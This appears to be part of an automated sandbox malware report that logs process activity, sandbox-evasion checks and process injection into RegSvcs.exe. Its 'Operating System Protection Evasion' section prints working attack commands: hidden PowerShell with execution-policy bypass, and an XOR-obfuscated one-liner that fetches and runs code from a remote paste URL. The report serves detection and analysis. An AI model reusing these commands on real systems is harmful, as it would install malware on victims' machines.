            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3920Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4733Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4846Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9493Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 361Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6479
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3201
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 828Thread sleep count: 3920 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5168Thread sleep count: 56 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876Thread sleep count: 4733 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876Thread sleep count: 4846 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep time: -16602069666338586s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5936Thread sleep count: 6479 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3172Thread sleep count: 3201 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6996Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000004.00000002.2368586078.00000282818C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\O
            Source: wscript.exe, 0000000D.00000002.2948288689.000002135591D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RegSvcs.exe, 0000000B.00000002.4600211473.0000000000D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40A000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40C000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9F3008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40C000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8E4008
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
